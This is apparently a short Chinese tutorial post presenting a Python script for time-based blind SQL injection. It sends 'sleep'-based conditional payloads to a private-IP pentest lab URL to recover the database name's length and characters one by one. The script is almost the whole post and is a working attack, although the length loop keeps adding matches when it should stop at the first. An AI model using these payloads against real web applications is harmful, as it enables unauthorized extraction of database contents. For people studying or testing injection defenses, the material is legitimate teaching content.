基于时间盲注的python脚本

思路：重要的是构建payload，然后循环进行测试，通过对请求的时间进行判断payload是否正确，从而确定数据库的长度和数据库的名称.

#encoding=utf-8

#时间盲注脚本

import requests

import time

import datetime
#获取数据库长度
def database_len():
   
    #存放跑出的结果
    length=0
    database=''
    print ("start get length...")

    for l in range(1,15):

        startTime1=time.time()

        url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)

        response1 = requests.get(url1)

        if time.time() - startTime1 > 1:

            length+=l

    print ("the length :" , str(length))

       # break

    print ("start database sql injection...")
database_len()
#获取数据库名
def database_name():
    name = ''
    for j in range(1, 15):           #根据数据库名长度自行修改15这个数值
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = '''http://172.20.10.14/pentest/test/time/'''
            payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                name += i
                print(name)
                break
    print('database_name:', name)


database_name()

跑出的效果图